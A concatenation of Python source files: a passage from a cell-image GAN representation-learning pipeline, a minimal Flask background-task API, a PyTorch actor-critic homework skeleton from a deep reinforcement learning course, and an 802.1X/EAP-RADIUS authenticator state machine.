p = multiprocessing.Process(
target=cell_segment, args=(i, negative_npy_root + str(intensity)
+ '/', ref_path, intensity))
p.start()
jobs.append(p)
if (index + 1) % 7 == 0:
p.join()
jobs = []
for job in jobs:
p.join()
else:
for index, i in enumerate(positive_images_path):
cell_segment(i, positive_npy_root + str(intensity)
+ '/', ref_path, intensity)
for index, i in enumerate(negative_images_path):
cell_segment(i, negative_npy_root + str(intensity)
+ '/', ref_path, intensity)
def split_dataset(path, fold=4, random_seed=42):
'''
Split dataset in k folds
Parameters
----------
path : str
path to npy file with images.
fold : int, optional
number of folds to split the dataset. The default is 4.
random_seed : int, optional
random seed. The default is 42.
Returns
-------
train_list : list
list with paths of split training data files.
test_list : list
list with paths of split testing data files.
'''
np.random.seed(random_seed)
kf = KFold(n_splits=fold, shuffle=True)
kf.get_n_splits(path)
train_list, test_list = [], []
for train_index, test_index in kf.split(path):
train_list.append([path[n] for n in train_index])
test_list.append([path[n] for n in test_index])
return train_list, test_list
def eval_plots(values_D_G, l_q, purities, experiment_root, sample=30):
'''
Create and save evaluation plots - purity and loss over iterations
Parameters
----------
values_D_G : array
values of function V(D, G) over iterations. Used to evaluate how well the generator distribution matches the real data distribution.
l_q : array
values of loss function of auxiliary network over iterations.
purities : array
values of clustering purity over iterations.
experiment_root : str
path of experiment root.
sample : int, optional
sample rate to plot. The default is 30.
Returns
-------
None.
'''
if len(purities) > 0:
# sample purities to plot
sample_purities = []
indexes = []
for i in range(0, len(purities)):
if i % 30 == 0:
sample_purities.append(purities[i])
indexes.append(i)
figure(figsize=(10, 6), dpi=80)
plt.plot(indexes, sample_purities, label="purities")
plt.xlabel("Generator iterations")
plt.ylabel("Purity")
plt.legend()
plt.savefig(experiment_root + "purities.png")
# sample l_q and vdg to plot
sample_lq = []
sample_vdg = []
indexes = []
for i in range(0, len(l_q)):
if i % 30 == 0:
sample_lq.append(l_q[i])
sample_vdg.append(values_D_G[i])
indexes.append(i)
figure(figsize=(10, 6), dpi=80)
plt.plot(indexes, sample_vdg, label="V(D,G)")
plt.plot(indexes, sample_lq, label="Lq")
plt.xlabel("Generator iterations")
plt.ylabel("Loss")
plt.legend()
plt.savefig(experiment_root + "loss.png")
def cell_representation(X_train_path, X_test_path, y_train_path, y_test_path,
experiment_root, n_epoch=50, batchsize=16, rand=32,
dis_category=5, ld = 1e-4, lg = 1e-4, lq = 1e-4,
save_model_steps=100, image_classification = False):
'''
Creates and trains model of cell-level visual representation learning
Parameters
----------
X_train_path : str
path to .npy file with training data
X_test_path : str
path to .npy file with testing data
y_train_path : str
path to .npy file with training labels
y_test_path : str
path to .npy file with testing labels
experiment_root : str
path to experiment root
n_epoch : int
number of epochs for training. The default is 50.
batchsize : int
batch size. The default is 16.
rand : int
number of gaussian noise variables. The default is 32.
dis_category : int
number of categories / clusters. The default is 5.
ld : float
learning rate for discriminator network D. The default is 1e-4.
lg : float
learning rate for generator network G. The default is 1e-4.
lq : float
learning rate for auxiliary network Q. The default is 1e-4.
save_model_steps : int
number of steps to save the model. The default is 100.
image_classification : bool, optional
if the training is for image classification or not. The default is False.
Returns
-------
values_D_G : list
values of function V(D, G) over iterations. Used to evaluate how well the generator distribution matches the real data distribution
l_q : list
values of loss function of auxiliary network over iterations.
purities: list
values of clustering purity over iterations
'''
# load training and testing datasets
X_train = np.load(X_train_path)
X_test = np.load(X_test_path)
y_train = np.load(y_train_path)
y_test = np.load(y_test_path)
# create cell training and testing sets
cell_train_set = np.concatenate([X_train, X_test])
cell_test_set = cell_train_set
cell_test_label = np.concatenate([y_train, y_test])
# initialize empty npys
positive_train_npy = []
positive_test_npy = []
negative_train_npy = []
negative_test_npy = []
# create / initialize the model
netD, netG, netD_D, netD_Q = create_model(rand=rand, dis_category=dis_category)
# train cell representation
values_D_G, l_q, purities = train_representation(
cell_train_set, cell_test_set, cell_test_label,
positive_train_npy, positive_test_npy, negative_train_npy,
negative_test_npy, netD, netG,
netD_D, netD_Q, experiment_root, n_epoch=n_epoch,
batchsize=batchsize, rand=rand,
dis_category=dis_category, ld=ld, lg=lg, lq=lq,
save_model_steps=save_model_steps,
image_classification = image_classification)
# convert l_q to numpy
l_q_np = []
for i in range(0, len(l_q)):
l_q_np.append(l_q[i].cpu().detach().numpy())
# save results
np.save(experiment_root + 'purities', purities)
np.save(experiment_root + 'values_D_G', values_D_G)
np.save(experiment_root + 'l_q', l_q_np)
# save evaluation plots
eval_plots(values_D_G, l_q_np, purities, experiment_root)
# view resulting representations
model_path = experiment_root + "/model/"
figure_8(X_train_path, X_test_path, model_path, output_dir=experiment_root)
return values_D_G, l_q_np, purities
def cell_representation_unlabeled(images_path, ref_path, npy_path, experiment_root, n_epoch=50,
batchsize=16, rand=32, dis_category=5, ld = 1e-4, lg = 1e-4,
lq = 1e-4, save_model_steps=100, image_classification = False):
'''
Creates and trains model of cell-level visual representation learning with unlabeled data
Parameters
----------
images_path : str
path with images for preping.
ref_path : str
path with reference image for stain normalization.
npy_path : str
path to save npy file with single-cell images.
experiment_root : str
path to experiment root
n_epoch : int
number of epochs for training. The default is 50.
batchsize : int
batch size. The default is 16.
rand : int
number of gaussian noise variables. The default is 32.
dis_category : int
number of categories / clusters. The default is 5.
ld : float
learning rate for discriminator network D. The default is 1e-4.
lg : float
learning rate for generator network G. The default is 1e-4.
lq : float
learning rate for auxiliary network Q. The default is 1e-4.
save_model_steps : int
number of steps to save the model. The default is 100.
image_classification : bool, optional
if the training is for image classification or not. The default is False.
Returns
-------
values_D_G : list
values of function V(D, G) over iterations. Used to evaluate how well the generator distribution matches the real data distribution
l_q : list
values of loss function of auxiliary network over iterations.
'''
# prep data, generate npy file
masks_to_npy(images_path, ref_path, npy_path)
# load training data
X_train = np.load(npy_path + "Train.npy")
# create datasets
cell_train_set = X_train
cell_test_set = np.array([])
cell_test_label = np.array([])
# initialize empty npys
positive_train_npy = []
positive_test_npy = []
negative_train_npy = []
negative_test_npy = []
# create / initialize the model
netD, netG, netD_D, netD_Q = create_model(rand=rand, dis_category=dis_category)
# train cell representation
values_D_G, l_q = train_representation(
cell_train_set, cell_test_set, cell_test_label,
positive_train_npy, positive_test_npy, negative_train_npy,
negative_test_npy, netD, netG,
netD_D, netD_Q, experiment_root, n_epoch=n_epoch,
batchsize=batchsize, rand=rand,
dis_category=dis_category, ld=ld, lg=lg, lq=lq,
save_model_steps=save_model_steps,
image_classification = image_classification)
# convert l_q to numpy
l_q_np = []
for i in range(0, len(l_q)):
l_q_np.append(l_q[i].cpu().detach().numpy())
# save results
np.save(experiment_root + 'values_D_G', values_D_G)
np.save(experiment_root + 'l_q', l_q_np)
# save evaluation plots
eval_plots(values_D_G, l_q_np, [], experiment_root)
X_train_path = npy_path + "Train.npy"
X_test_path = None
model_path = experiment_root + "/model/"
figure_8(X_train_path, X_test_path, model_path, rand = rand, dis_category = dis_category, output_dir=experiment_root)
return values_D_G, l_q_np
def image_classification(positive_images_root, negative_images_root,
positive_npy_root,negative_npy_root, ref_path, intensity,
X_train_path, X_test_path, y_train_path, y_test_path,
experiment_root, multi_core = True, fold = 4, random_seed=42,
choosing_fold = 1, n_epoch=10000, batchsize=32, rand=64,
dis_category=5, ld = 1e-4, lg = 1e-4, lq = 1e-4,
save_model_steps = 100, image_classification = True):
'''
Applies cell segmentation to images. Creates and trains model of cell-level visual representation learning. Performs image classification
Parameters
----------
positive_images_root : str
path with positive images.
negative_images_root : str
path with negative images.
positive_npy_root : str
path with positive npy file.
negative_npy_root : str
path with negative npy file.
ref_path : str
path with reference image for stain normalization.
intensity : int
intensity for segmentation thresholding.
X_train_path : str
path with training data.
X_test_path : str
path with testing data.
y_train_path : str
path with training labels.
y_test_path : str
path with testing labels.
experiment_root : str
path of experiment root.
multi_core : bool, optional
if the process is multi core. The default is True.
fold : int, optional
number of folds to split dataset. The default is 4.
random_seed : int, optional
random seed. The default is 42.
choosing_fold : int, optional
The default is 1.
n_epoch : int, optional
number of epochs for training. The default is 10000.
batchsize : int, optional
size of the batch. The default is 32.
rand : int, optional
number of gaussian noise variables. The default is 64.
dis_category : int, optional
number of categories / clusters. The default is 5.
ld : float, optional
learning rate for discriminator network D. The default is 1e-4.
lg : float, optional
learning rate for generator network G. The default is 1e-4.
lq : float, optional
learning rate for auxiliary network Q. The default is 1e-4.
save_model_steps : int, optional
number of steps to save the model. The default is 100.
image_classification : bool, optional
if the training is for image classification or not. The default is True.
Returns
-------
None.
'''
positive_npy_path = [positive_npy_root +str(intensity)+'/' + n[:-3] +
'npy' for n in os.listdir(positive_images_root)]
negative_npy_path =[negative_npy_root +str(intensity)+'/' + n[:-3] +
'npy' for n in os.listdir(negative_images_root)]
positive_train_list, positive_test_list = split_dataset(positive_npy_path,
fold, random_seed)
negative_train_list, negative_test_list = split_dataset(negative_npy_path,
fold, random_seed)
positive_train_npy = [np.load(n, allow_pickle=True) for n in
positive_train_list[choosing_fold]]
positive_test_npy = [np.load(n, allow_pickle=True) for n in
positive_test_list[choosing_fold]]
negative_train_npy = [np.load(n, allow_pickle=True) for n in
negative_train_list[choosing_fold]]
negative_test_npy = [np.load(n, allow_pickle=True) for n in
negative_test_list[choosing_fold]]
cell_train_set = np.concatenate([np.concatenate(positive_train_npy), np.concatenate(negative_train_npy)])
# load training and testing datasets
X_train = np.load(X_train_path)
X_test = np.load(X_test_path)
y_train = np.load(y_train_path)
y_test = np.load(y_test_path)
# create cell training and testing sets
cell_test_set = np.concatenate([X_train, X_test])
cell_test_label = np.concatenate([y_train, y_test])
cell_train_set = rotation(cell_test_set)
# create / initialize the model
netD, netG, netD_D, netD_Q = create_model(rand=rand, dis_category=dis_category)
# train cell representation
values_D_G, l_q, purities = train_representation(
cell_train_set, cell_test_set, cell_test_label, positive_train_npy,
positive_test_npy, negative_train_npy, negative_test_npy, netD, netG, netD_D,
netD_Q, experiment_root, n_epoch=n_epoch, batchsize=batchsize, rand=rand,
dis_category=dis_category,
ld = ld, lg = lg, lq = lq, save_model_steps=save_model_steps,
image_classification=image_classification,)
# convert l_q to numpy
l_q_np = []
for i in range(0, len(l_q)):
l_q_np.append(l_q[i].cpu().detach().numpy())
# save results
np.save(experiment_root + 'purities', purities)
np.save(experiment_root + 'values_D_G', values_D_G)
np.save(experiment_root + 'l_q', l_q_np)
# save evaluation plots
eval_plots(values_D_G, l_q_np, purities, experiment_root)
# view resulting representations
model_path = experiment_root + "/model/"
figure_8(X_train_path, X_test_path, model_path, output_dir=experiment_root)
return values_D_G, l_q_np, purities
|
rest_api_return_and_process.py
|
import multiprocessing
from flask import Flask, jsonify, request, make_response, abort
app = Flask(__name__)
def long_running_task(thread_name):
for i in range(100000000):
if i % 100000 == 0:
print('Processing request ' + str(thread_name))
@app.route('/eshan/api/v1.0/superheroes/add', methods=['POST'])
def add_superhero():
if not request.json or 'id' not in request.json:
abort(400)
id = request.json['id']
thread = multiprocessing.Process(target=long_running_task, args=(id,))
thread.start()
print('returning before the process ends. Process will continue in background')
return jsonify({'status': 'running'})
@app.errorhandler(404)
def not_found():
return make_response(jsonify({'error': 'Not found'}), 404)
if __name__ == '__main__':
app.run(debug=True)
|
train_ac_f18.py
|
"""
Original code from John Schulman for CS294 Deep Reinforcement Learning Spring 2017
Adapted for CS294-112 Fall 2017 by Abhishek Gupta and Joshua Achiam
Adapted for CS294-112 Fall 2018 by Soroush Nasiriany, Sid Reddy, and Greg Kahn
Adapted for pytorch version by Ning Dai
"""
import numpy as np
import torch
import gym
import logz
import os
import time
import inspect
from torch.multiprocessing import Process
from torch import nn, optim
#============================================================================================#
# Utilities
#============================================================================================#
def build_mlp(input_size, output_size, n_layers, hidden_size, activation=nn.Tanh):
"""
Builds a feedforward neural network
arguments:
input_size: size of the input layer
output_size: size of the output layer
n_layers: number of hidden layers
hidden_size: dimension of the hidden layers
activation: activation of the hidden layers
output_activation: activation of the output layer
returns:
an instance of nn.Sequential which contains the feedforward neural network
Hint: use nn.Linear
"""
layers = []
# YOUR HW2 CODE HERE
raise NotImplementedError
return nn.Sequential(*layers).apply(weights_init)
def weights_init(m):
if hasattr(m, 'weight'):
nn.init.xavier_uniform_(m.weight)
def pathlength(path):
return len(path["reward"])
def setup_logger(logdir, locals_):
# Configure output directory for logging
logz.configure_output_dir(logdir)
# Log experimental parameters
args = inspect.getargspec(train_AC)[0]
hyperparams = {k: locals_[k] if k in locals_ else None for k in args}
logz.save_hyperparams(hyperparams)
class PolicyNet(nn.Module):
def __init__(self, neural_network_args):
super(PolicyNet, self).__init__()
self.ob_dim = neural_network_args['ob_dim']
self.ac_dim = neural_network_args['ac_dim']
self.discrete = neural_network_args['discrete']
self.hidden_size = neural_network_args['size']
self.n_layers = neural_network_args['actor_n_layers']
self.define_model_components()
def define_model_components(self):
"""
Define the parameters of policy network here.
You can use any instance of nn.Module or nn.Parameter.
Hint: use the 'build_mlp' function above
In the discrete case, model should output logits of a categorical distribution
over the actions
In the continuous case, model should output a tuple (mean, log_std) of a Gaussian
distribution over actions. log_std should just be a trainable
variable, not a network output.
"""
# YOUR HW2 CODE HERE
if self.discrete:
raise NotImplementedError
else:
raise NotImplementedError
#========================================================================================#
# ----------PROBLEM 2----------
#========================================================================================#
"""
Notes on notation:
Pytorch tensor variables have the prefix ts_, to distinguish them from the numpy array
variables that are computed later in the function
Prefixes and suffixes:
ob - observation
ac - action
_no - this tensor should have shape (batch size, observation dim)
_na - this tensor should have shape (batch size, action dim)
_n - this tensor should have shape (batch size)
Note: batch size is defined at runtime
"""
def forward(self, ts_ob_no):
"""
Define forward pass for policy network.
arguments:
ts_ob_no: (batch_size, self.ob_dim)
returns:
the parameters of the policy.
if discrete, the parameters are the logits of a categorical distribution
over the actions
ts_logits_na: (batch_size, self.ac_dim)
if continuous, the parameters are a tuple (mean, log_std) of a Gaussian
distribution over actions. log_std should just be a trainable
variable, not a network output.
ts_mean: (batch_size, self.ac_dim)
st_logstd: (self.ac_dim,)
Hint: use the components you defined in self.define_model_components
"""
raise NotImplementedError
if self.discrete:
# YOUR HW2 CODE HERE
ts_logits_na = None
return ts_logits_na
else:
# YOUR HW2 CODE HERE
ts_mean = None
ts_logstd = None
return (ts_mean, ts_logstd)
#============================================================================================#
# Actor Critic
#============================================================================================#
class Agent(object):
def __init__(self, neural_network_args, sample_trajectory_args, estimate_advantage_args):
super(Agent, self).__init__()
self.ob_dim = neural_network_args['ob_dim']
self.ac_dim = neural_network_args['ac_dim']
self.discrete = neural_network_args['discrete']
self.hidden_size = neural_network_args['size']
self.critic_n_layers = neural_network_args['critic_n_layers']
self.actor_learning_rate = neural_network_args['actor_learning_rate']
self.critic_learning_rate = neural_network_args['critic_learning_rate']
self.num_target_updates = neural_network_args['num_target_updates']
self.num_grad_steps_per_target_update = neural_network_args['num_grad_steps_per_target_update']
self.animate = sample_trajectory_args['animate']
self.max_path_length = sample_trajectory_args['max_path_length']
self.min_timesteps_per_batch = sample_trajectory_args['min_timesteps_per_batch']
self.gamma = estimate_advantage_args['gamma']
self.normalize_advantages = estimate_advantage_args['normalize_advantages']
self.policy_net = PolicyNet(neural_network_args)
self.value_net = build_mlp(self.ob_dim, 1, self.critic_n_layers, self.hidden_size)
self.actor_optimizer = optim.Adam(self.policy_net.parameters(), lr=self.actor_learning_rate)
self.critic_optimizer = optim.Adam(self.value_net.parameters(), lr=self.critic_learning_rate)
def sample_action(self, ob_no):
"""
Build the method used for sampling action from the policy distribution
arguments:
ob_no: (batch_size, self.ob_dim)
returns:
sampled_ac:
if discrete: (batch_size)
if continuous: (batch_size, self.ac_dim)
Hint: for the continuous case, use the reparameterization trick:
The output from a Gaussian distribution with mean 'mu' and std 'sigma' is
mu + sigma * z, z ~ N(0, I)
This reduces the problem to just sampling z. (Hint: use torch.normal!)
"""
ts_ob_no = torch.from_numpy(ob_no).float()
raise NotImplementedError
if self.discrete:
ts_logits_na = self.policy_net(ts_ob_no)
# YOUR HW2 CODE HERE
ts_probs = None
ts_sampled_ac = None
else:
ts_mean, ts_logstd = self.policy_net(ts_ob_no)
# YOUR HW2 CODE HERE
ts_sampled_ac = None
sampled_ac = ts_sampled_ac.numpy()
return sampled_ac
def get_log_prob(self, policy_parameters, ts_ac_na):
"""
Build the method used for computing the log probability of a set of actions
that were actually taken according to the policy
arguments:
policy_parameters
if discrete: logits of a categorical distribution over actions
ts_logits_na: (batch_size, self.ac_dim)
if continuous: (mean, log_std) of a Gaussian distribution over actions
ts_mean: (batch_size, self.ac_dim)
ts_logstd: (self.ac_dim,)
ts_ac_na: (batch_size, self.ac_dim)
returns:
ts_logprob_n: (batch_size)
Hint:
For the discrete case, use the log probability under a categorical distribution.
For the continuous case, use the log probability under a multivariate gaussian.
"""
raise NotImplementedError
if self.discrete:
ts_logits_na = policy_parameters
# YOUR HW2 CODE HERE
ts_logprob_n = None
else:
ts_mean, ts_logstd = policy_parameters
# YOUR HW2 CODE HERE
ts_logprob_n = None
return ts_logprob_n
def sample_trajectories(self, itr, env):
# Collect paths until we have enough timesteps
timesteps_this_batch = 0
paths = []
while True:
animate_this_episode=(len(paths)==0 and (itr % 10 == 0) and self.animate)
path = self.sample_trajectory(env, animate_this_episode)
paths.append(path)
timesteps_this_batch += pathlength(path)
if timesteps_this_batch > self.min_timesteps_per_batch:
break
return paths, timesteps_this_batch
def sample_trajectory(self, env, animate_this_episode):
ob = env.reset()
obs, acs, rewards, next_obs, terminals = [], [], [], [], []
steps = 0
while True:
if animate_this_episode:
env.render()
time.sleep(0.1)
obs.append(ob)
raise NotImplementedError
ac = None # YOUR HW2 CODE HERE
ac = ac[0]
acs.append(ac)
ob, rew, done, _ = env.step(ac)
# add the observation after taking a step to next_obs
# YOUR CODE HERE
raise NotImplementedError
rewards.append(rew)
steps += 1
# If the episode ended, the corresponding terminal value is 1
# otherwise, it is 0
# YOUR CODE HERE
if done or steps > self.max_path_length:
raise NotImplementedError
break
else:
raise NotImplementedError
path = {"observation" : np.array(obs, dtype=np.float32),
"reward" : np.array(rewards, dtype=np.float32),
"action" : np.array(acs, dtype=np.float32),
"next_observation": np.array(next_obs, dtype=np.float32),
"terminal": np.array(terminals, dtype=np.float32)}
return path
def estimate_advantage(self, ob_no, next_ob_no, re_n, terminal_n):
"""
Estimates the advantage function value for each timestep.
let sum_of_path_lengths be the sum of the lengths of the paths sampled from
Agent.sample_trajectories
arguments:
ob_no: shape: (sum_of_path_lengths, ob_dim)
next_ob_no: shape: (sum_of_path_lengths, ob_dim). The observation after taking one step forward
re_n: length: sum_of_path_lengths. Each element in re_n is a scalar containing
the reward for each timestep
terminal_n: length: sum_of_path_lengths. Each element in terminal_n is either 1 if the episode ended
at that timestep of 0 if the episode did not end
returns:
adv_n: shape: (sum_of_path_lengths). A single vector for the estimated
advantages whose length is the sum of the lengths of the paths
"""
# First, estimate the Q value as Q(s, a) = r(s, a) + gamma*V(s')
# To get the advantage, subtract the V(s) to get A(s, a) = Q(s, a) - V(s)
# This requires calling the critic twice --- to obtain V(s') when calculating Q(s, a),
# and V(s) when subtracting the baseline
# Note: don't forget to use terminal_n to cut off the V(s') term when computing Q(s, a)
# otherwise the values will grow without bound.
# YOUR CODE HERE
raise NotImplementedError
adv_n = None
if self.normalize_advantages:
raise NotImplementedError
adv_n = None # YOUR HW2 CODE HERE
return adv_n
def update_critic(self, ob_no, next_ob_no, re_n, terminal_n):
"""
Update the parameters of the critic.
let sum_of_path_lengths be the sum of the lengths of the paths sampled from
Agent.sample_trajectories
let num_paths be the number of paths sampled from Agent.sample_trajectories
arguments:
ob_no: shape: (sum_of_path_lengths, ob_dim)
next_ob_no: shape: (sum_of_path_lengths, ob_dim). The observation after taking one step forward
re_n: length: sum_of_path_lengths. Each element in re_n is a scalar containing
the reward for each timestep
terminal_n: length: sum_of_path_lengths. Each element in terminal_n is either 1 if the episode ended
at that timestep of 0 if the episode did not end
returns:
nothing
"""
# Use a bootstrapped target values to update the critic
# Compute the target values r(s, a) + gamma*V(s') by calling the critic to compute V(s')
# In total, take n=self.num_grad_steps_per_target_update*self.num_target_updates gradient update steps
# Every self.num_grad_steps_per_target_update steps, recompute the target values
# by evaluating V(s') on the updated critic
# Note: don't forget to use terminal_n to cut off the V(s') term when computing the target
# otherwise the values will grow without bound.
# YOUR CODE HERE
raise NotImplementedError
def update_actor(self, ob_no, ac_na, adv_n):
"""
Update the parameters of the policy.
arguments:
ob_no: shape: (sum_of_path_lengths, ob_dim)
ac_na: shape: (sum_of_path_lengths).
adv_n: shape: (sum_of_path_lengths). A single vector for the estimated
advantages whose length is the sum of the lengths of the paths
returns:
nothing
"""
# convert numpy array to pytorch tensor
ts_ob_no, ts_ac_na, ts_adv_n = map(lambda x: torch.from_numpy(x), [ob_no, ac_na, adv_n])
# The policy takes in an observation and produces a distribution over the action space
policy_parameters = self.policy_net(ts_ob_no)
# We can compute the logprob of the actions that were actually taken by the policy
# This is used in the loss function.
ts_logprob_n = self.get_log_prob(policy_parameters, ts_ac_na)
# clean the gradient for model parameters
self.actor_optimizer.zero_grad()
actor_loss = - (ts_logprob_n * ts_adv_n).mean()
actor_loss.backward()
self.actor_optimizer.step()
def train_AC(
exp_name,
env_name,
n_iter,
gamma,
min_timesteps_per_batch,
max_path_length,
actor_learning_rate,
critic_learning_rate,
num_target_updates,
num_grad_steps_per_target_update,
animate,
logdir,
normalize_advantages,
seed,
actor_n_layers,
critic_n_layers,
size):
start = time.time()
#========================================================================================#
# Set Up Logger
#========================================================================================#
setup_logger(logdir, locals())
#========================================================================================#
# Set Up Env
#========================================================================================#
# Make the gym environment
env = gym.make(env_name)
# Set random seeds
torch.manual_seed(seed)
np.random.seed(seed)
env.seed(seed)
# Maximum length for episodes
max_path_length = max_path_length or env.spec.max_episode_steps
# Is this env continuous, or self.discrete?
discrete = isinstance(env.action_space, gym.spaces.Discrete)
# Observation and action sizes
ob_dim = env.observation_space.shape[0]
ac_dim = env.action_space.n if discrete else env.action_space.shape[0]
#========================================================================================#
# Initialize Agent
#========================================================================================#
neural_network_args = {
'actor_n_layers': actor_n_layers,
'critic_n_layers': critic_n_layers,
'ob_dim': ob_dim,
'ac_dim': ac_dim,
'discrete': discrete,
'size': size,
'actor_learning_rate': actor_learning_rate,
'critic_learning_rate': critic_learning_rate,
'num_target_updates': num_target_updates,
'num_grad_steps_per_target_update': num_grad_steps_per_target_update,
}
sample_trajectory_args = {
'animate': animate,
'max_path_length': max_path_length,
'min_timesteps_per_batch': min_timesteps_per_batch,
}
estimate_advantage_args = {
'gamma': gamma,
'normalize_advantages': normalize_advantages,
}
agent = Agent(neural_network_args, sample_trajectory_args, estimate_advantage_args)
#========================================================================================#
# Training Loop
#========================================================================================#
total_timesteps = 0
for itr in range(n_iter):
print("********** Iteration %i ************"%itr)
with torch.no_grad(): # use torch.no_grad to disable the gradient calculation
paths, timesteps_this_batch = agent.sample_trajectories(itr, env)
total_timesteps += timesteps_this_batch
# Build arrays for observation, action for the policy gradient update by concatenating
# across paths
ob_no = np.concatenate([path["observation"] for path in paths])
ac_na = np.concatenate([path["action"] for path in paths])
re_n = np.concatenate([path["reward"] for path in paths])
next_ob_no = np.concatenate([path["next_observation"] for path in paths])
terminal_n = np.concatenate([path["terminal"] for path in paths])
# Call tensorflow operations to:
# (1) update the critic, by calling agent.update_critic
# (2) use the updated critic to compute the advantage by, calling agent.estimate_advantage
# (3) use the estimated advantage values to update the actor, by calling agent.update_actor
# YOUR CODE HERE
raise NotImplementedError
# Log diagnostics
returns = [path["reward"].sum() for path in paths]
ep_lengths = [pathlength(path) for path in paths]
logz.log_tabular("Time", time.time() - start)
logz.log_tabular("Iteration", itr)
logz.log_tabular("AverageReturn", np.mean(returns))
logz.log_tabular("StdReturn", np.std(returns))
logz.log_tabular("MaxReturn", np.max(returns))
logz.log_tabular("MinReturn", np.min(returns))
logz.log_tabular("EpLenMean", np.mean(ep_lengths))
logz.log_tabular("EpLenStd", np.std(ep_lengths))
logz.log_tabular("TimestepsThisBatch", timesteps_this_batch)
logz.log_tabular("TimestepsSoFar", total_timesteps)
logz.dump_tabular()
logz.save_pytorch_model(agent)
def main():
import argparse
parser = argparse.ArgumentParser()
parser.add_argument('env_name', type=str)
parser.add_argument('--exp_name', type=str, default='vac')
parser.add_argument('--render', action='store_true')
parser.add_argument('--discount', type=float, default=1.0)
parser.add_argument('--n_iter', '-n', type=int, default=100)
parser.add_argument('--batch_size', '-b', type=int, default=1000)
parser.add_argument('--ep_len', '-ep', type=float, default=-1.)
parser.add_argument('--actor_learning_rate', '-lr', type=float, default=5e-3)
parser.add_argument('--critic_learning_rate', '-clr', type=float)
parser.add_argument('--dont_normalize_advantages', '-dna', action='store_true')
parser.add_argument('--num_target_updates', '-ntu', type=int, default=10)
parser.add_argument('--num_grad_steps_per_target_update', '-ngsptu', type=int, default=10)
parser.add_argument('--seed', type=int, default=1)
parser.add_argument('--n_experiments', '-e', type=int, default=1)
parser.add_argument('--actor_n_layers', '-l', type=int, default=2)
parser.add_argument('--critic_n_layers', '-cl', type=int)
parser.add_argument('--size', '-s', type=int, default=64)
args = parser.parse_args()
if not(os.path.exists('data')):
os.makedirs('data')
logdir = 'ac_' + args.exp_name + '_' + args.env_name + '_' + time.strftime("%d-%m-%Y_%H-%M-%S")
logdir = os.path.join('data', logdir)
if not(os.path.exists(logdir)):
os.makedirs(logdir)
max_path_length = args.ep_len if args.ep_len > 0 else None
if not args.critic_learning_rate:
args.critic_learning_rate = args.actor_learning_rate
if not args.critic_n_layers:
args.critic_n_layers = args.actor_n_layers
processes = []
for e in range(args.n_experiments):
seed = args.seed + 10*e
print('Running experiment with seed %d'%seed)
def train_func():
train_AC(
exp_name=args.exp_name,
env_name=args.env_name,
n_iter=args.n_iter,
gamma=args.discount,
min_timesteps_per_batch=args.batch_size,
max_path_length=max_path_length,
actor_learning_rate=args.actor_learning_rate,
critic_learning_rate=args.critic_learning_rate,
num_target_updates=args.num_target_updates,
num_grad_steps_per_target_update=args.num_grad_steps_per_target_update,
animate=args.render,
logdir=os.path.join(logdir,'%d'%seed),
normalize_advantages=not(args.dont_normalize_advantages),
seed=seed,
actor_n_layers=args.actor_n_layers,
critic_n_layers=args.critic_n_layers,
size=args.size
)
p = Process(target=train_func, args=tuple())
p.start()
processes.append(p)
# if you comment in the line below, then the loop will block
# until this process finishes
# p.join()
for p in processes:
p.join()
if __name__ == "__main__":
main()
|
authenticator.py
|
"""Authenticator module"""
from __future__ import absolute_import
from eap_module import EapModule
from heartbeat_scheduler import HeartbeatScheduler
from radius_module import RadiusModule, RadiusPacketInfo, RadiusSocketInfo, port_id_to_int
from message_parser import IdentityMessage, FailureMessage
import json
import threading
import time
import utils
class AuthStateMachine:
"""Authenticator state machine"""
START = "start"
SUPPLICANT = "Talk to Supplicant"
RADIUS = "Talk to RADIUS server"
FAIL = "Test Failed"
SUCCESS = "Test Succeeded"
def __init__(self, src_mac, auth_mac, idle_time, retry_count,
eap_send_callback, radius_send_callback, auth_callback):
self.state = None
self._state_lock = threading.Lock()
self._timer_lock = threading.RLock()
self.logger = utils.get_logger('AuthSM')
self.src_mac = src_mac
self.eap_send_callback = eap_send_callback
self.radius_send_callback = radius_send_callback
self.auth_callback = auth_callback
self.identity = None
self.authentication_mac = auth_mac
self.radius_state = None
self._idle_time = idle_time
self._max_retry_count = retry_count
self._current_timeout = None
self._retry_func = None
self._retry_args = None
self._current_retries = None
def initialize(self):
"""Initialize state machine"""
self._state_transition(self.START)
self._set_timeout(self._idle_time)
self._set_retry_actions(retry_func=self.eap_send_callback, retry_args=[self.src_mac])
def _state_transition(self, target, expected=None):
with self._state_lock:
if expected is not None:
message = 'state was %s expected %s' % (self.state, expected)
assert self.state == expected, message
self.logger.debug('Transition for %s: %s -> %s', self.src_mac, self.state, target)
self.state = target
def received_eapol_start(self):
"""Received EAPOL start on EAP socket"""
self._state_transition(self.SUPPLICANT, self.START)
self._set_timeout(self._idle_time)
self._set_retry_actions(retry_func=self.eap_send_callback, retry_args=[self.src_mac])
self.eap_send_callback(self.src_mac)
def received_eap_request(self, eap_message):
"""Received EAP request"""
if isinstance(eap_message, IdentityMessage) and not self.identity:
self.identity = eap_message.identity
self._state_transition(self.RADIUS, self.SUPPLICANT)
port_id = port_id_to_int(self.authentication_mac)
radius_packet_info = RadiusPacketInfo(
eap_message, self.src_mac, self.identity, self.radius_state, port_id)
self._set_timeout(self._idle_time)
self._set_retry_actions(
retry_func=self.radius_send_callback, retry_args=[radius_packet_info])
self.radius_send_callback(radius_packet_info)
def received_radius_response(self, payload, radius_state, packet_type):
"""Received RADIUS access channel"""
self.radius_state = radius_state
if packet_type == 'RadiusAccessReject':
self._state_transition(self.FAIL, self.RADIUS)
eap_message = FailureMessage(self.src_mac, 255)
self.auth_callback(self.src_mac, False)
else:
eap_message = payload
if packet_type == 'RadiusAccessAccept':
self._state_transition(self.SUCCESS, self.RADIUS)
self.auth_callback(self.src_mac, True)
else:
self._state_transition(self.SUPPLICANT, self.RADIUS)
self._set_timeout(self._idle_time)
self._set_retry_actions(
retry_func=self.eap_send_callback, retry_args=[self.src_mac, eap_message])
self.eap_send_callback(self.src_mac, eap_message)
def _set_timeout(self, timeout_time=None, clear=False):
with self._timer_lock:
if clear:
self._current_timeout = None
else:
self._current_timeout = time.time() + timeout_time
def _set_retry_actions(self, retry_func=None, retry_args=None):
self._retry_func = retry_func
self._retry_args = list(retry_args)
self._current_retries = 0
def _clear_retry_actions(self):
self._retry_func = None
self._retry_args = None
self._current_retries = 0
def handle_timer(self):
"""Handle timer and check if timeout is exceeded"""
with self._timer_lock:
if self._current_timeout:
if time.time() > self._current_timeout:
if self._current_retries < self._max_retry_count:
self._current_retries += 1
self._set_timeout(self._idle_time)
self._retry_func(*self._retry_args)
else:
self._handle_timeout()
